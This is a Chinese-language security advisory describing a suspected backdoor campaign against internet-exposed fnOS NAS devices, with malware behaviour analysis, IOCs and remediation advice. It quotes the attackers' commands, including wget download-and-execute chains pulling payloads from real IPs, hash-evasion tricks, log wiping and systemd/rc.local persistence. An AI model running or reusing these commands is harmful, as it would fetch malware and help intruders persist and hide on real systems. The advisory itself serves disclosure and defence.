重要/漏洞：飞牛 fnOS 疑似遭公网未授权访问/利用后植入后门组件漏洞编号：暂无（官方未公开 / 未分配 CVE）重要等级：严重（高危）CVSS 分数：暂无影响范围：fnOS 设备存在公网可达入口（端口映射/反代/直连公网）时风险显著上升；官方建议升级至 1.1.15 并验证关闭公网映射后异常是否停止

1. 06:38 · Jan 31, 2026 · Sat

   重要/漏洞：飞牛 fnOS 疑似遭公网未授权访问/利用后植入后门组件
   
   漏洞编号：暂无（官方未公开 / 未分配 CVE）
   重要等级：严重（高危）
   CVSS 分数：暂无
   
   影响范围：
   fnOS 设备存在公网可达入口（端口映射/反代/直连公网）时风险显著上升；官方建议升级至 1.1.15 并验证关闭公网映射后异常是否停止。
   论坛反馈即使仅使用 HTTPS 访问也可能出现同类驻留现象，说明风险不应仅限定为 HTTP 明文通道（可能存在其他公网暴露面、历史入侵残留或服务端漏洞可经 HTTPS 触发）
   
   受影响系统：
   fnOS（版本范围未公开）。官方社区回复称该问题官方已知，建议升级至 1.1.15，并在关闭公网端口映射后验证异常上传/连接是否停止。
   
   木马行为分析
   目前LoopDNS频道编辑已获取相关木马文件，下为行为分析
   
   1. 入侵者在通过未公开入口/利用链投放后门下载器后并执行
   下载二阶段载荷并执行（观测到的命令链）
   

   cd /tmp
   wget http://20.89.168.131/nginx
   chmod 777 nginx
   head -c 16 /dev/urandom >> nginx（向文件追加随机字节，改变哈希，规避基于哈希的检测）
   ./nginx
   wget http://20.89.168.131/trim_https_cgi
   chmod 777 trim_https_cgi
   head -c 16 /dev/urandom >> trim_https_cgi
   ./trim_https_cgi
   外联与拉取补充组件
   HTTP：GET http://151.240.13.91/trim_fnos
   TCP：连接 45.95.212.102:6608

   Expand hidden content

   
   
   2.后门驻留组件 gots
   
   A1. 写入后门主体与持久化文件
   

   创建/写入：/sbin/gots
   创建/写入：/etc/rc.local、/etc/rc.d/rc.local
   创建/写入 systemd 服务（变种服务名）：
   /etc/systemd/system/x86.service
   /etc/systemd/system/<sha256>.service
   执行持久化：systemctl enable <service>.service（含重定向到 /dev/null 的静默执行）
   自身复制/改名落地：
   /usr/bin/x86（样本发生目录重命名/落地）
   /usr/bin/<sha256>（样本发生目录重命名/落地）

   Expand hidden content

   
   
   A2. C2 通信与探测
   

   DNS：解析 aura.kabot.icu -> 45.95.212.102
   TCP：连接 45.95.212.102 多端口（观测到：3489、5098、6608、7489）
   论坛样本显示的附加行为（strings/排查结论）
   干扰系统工具：重命名/替换 cat（出现 mv /usr/bin/cat /usr/bin/cat2 等字符串，导致“cat 丢失”现象）
   结束系统进程：pkill -f 'network_service|resmon_service'
   修改持久化入口：改写 /etc/rc.local 与 /etc/systemd/system/%s.service 并 systemctl enable
   外联：包含 45.95.212.102 字符串并进行访问

   Expand hidden content

   
   
   3. 组件 trim_https_cgi
   
   清理痕迹
   

   清空多目录日志：/var/log/*、/usr/trim/logs/*、/run/log/journal 等
   删除审计日志：/var/log/audit/audit.log 及滚动文件
   删除/清理安全相关日志：/var/log/secure*、/var/log/messages*、wtmp/btmp/lastlog 等

   
   干扰业务与恢复功能
   

   结束服务：pkill -f backup_service、pkill -f sysrestore_service 等

   
   二阶段下载执行与启动脚本注入
   

   修改 /usr/trim/bin/system_startup.sh，追加下载执行链：
   wget http://151.240.13.91/turmp -O /tmp/turmp ; chmod 777 /tmp/turmp ; /tmp/turmp
   端口相关痕迹与疑似隐藏监听（来源于论坛排查）
   目标系统存在 0.0.0.0:57132 LISTEN，ss/netstat 无 PID，lsof/fuser 无结果
   trim_https_cgi 字符串包含 57132，并出现 kill -9 $(lsof -t -i:57132) 之类处理逻辑（提示该端口为其链路的一部分）

   Expand hidden content

   
   
   4.内核模块 snd_pcap（论坛排查）
   

   /etc/modules 被追加 snd_pcap
   模块文件：/lib/modules/6.12.18-trim/snd_pcap.ko
   与“57132 监听无 PID/无 lsof 结果”的现象存在关联怀疑（疑似内核层隐藏/驻留能力）

   
   
   关键落地痕迹
   

   不可变属性（immutable，需先 chattr -i 才能删除）：

   
   

   /usr/bin/nginx
   /usr/sbin/gots
   /usr/trim/bin/trim_https_cgi
   /etc/systemd/system/nginx.service
   /etc/systemd/system/trim_https_cgi.service
   /etc/rc.local

   Expand hidden content

   
   

   伪装/复用：/usr/bin/nginx 与 /usr/sbin/gots md5 相同（同一载荷多名称投放）
   rc.local 自启：/sbin/gots x86 &
   systemd 自启（示例）：ExecStart=/usr/bin/nginx x86（oneshot + enable）

   
   
   可疑网络基础设施（IOC）
   

   IP：45[.]95[.]212[.]102（C2/多端口连接）
   IP：151[.]240[.]13[.]91（HTTP 拉取二阶段：/trim_fnos、论坛样本）
   域名：aura[.]kabot[.]icu（解析到 45[.]95[.]212[.]102）
   下载源：20[.]89[.]168[.]131（HTTP 拉取：/nginx、/trim_https_cgi）
   归属信息：45[.]95[.]212[.]102 与 151[.]240[.]13[.]91 两个 IP 均归属 AS209554 ISIF OU 提供商网段

   
   
   处置建议
   1. 关闭公网端口映射/源站直通。
   2. 升级 fnOS 至官方建议版本（1.1.15 或更高）。
   3. 出口防火墙封禁：45.95.212.102、151.240.13.91，同时监控连接数与上传是否回落。
   4. 轮换所有管理口令/密钥；检查容器、计划任务、数据盘是否存在触发残留（官方提示“重装后仍可能再次触发”）。
   
   参考来源：飞牛社区